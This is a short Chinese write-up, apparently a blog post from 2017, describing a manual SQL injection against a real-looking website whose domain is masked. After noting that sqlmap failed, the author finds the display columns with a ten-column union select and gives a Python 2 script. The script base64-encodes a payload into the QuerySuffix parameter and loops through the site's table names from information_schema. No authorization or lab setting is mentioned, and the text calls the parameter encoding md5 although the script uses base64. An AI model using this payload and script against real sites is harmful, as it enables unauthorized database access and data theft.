网站的页面提交参数做了md5转换,而且参数会带入两个SQL语句中执行。
注入是肯定存在的,但是SQLMAP怎么都跑不出来(可能原因是其中有个SQL语句总是报错)。
尝试手工,发现 order by 报错。; ) 没关系,那就直接上union select。
经过尝试发现 union select 1,2,3,4,5,6,7,8,9,10 成功爆出显示位。下面写个脚本跑表,收工。
# -*- coding=utf-8 -*- #!/usr/bin/evn python # create: mi_white # Date:2017.06.29 import requests import re import base64 payload = """+union select 1,2,3,4,5,6,concat(0x7e, (select table_name from information_schema.tables limit ~~,1),0x7e),8,9,10 #""" url = '''http://www.XXXXX.com.cn/W.php?QuerySuffix=~~&page=1''' print u"正在读取表名:" for i in xrange(1,190): a = payload.replace("~~",str(i)) b = url.replace("~~", base64.encodestring(a)) try: req = requests.get(b,timeout=10) except: print u"读取页面失败。" continue try: html = re.findall(r"~(.*)~",req.text) print html except:print u"表名读取失败。"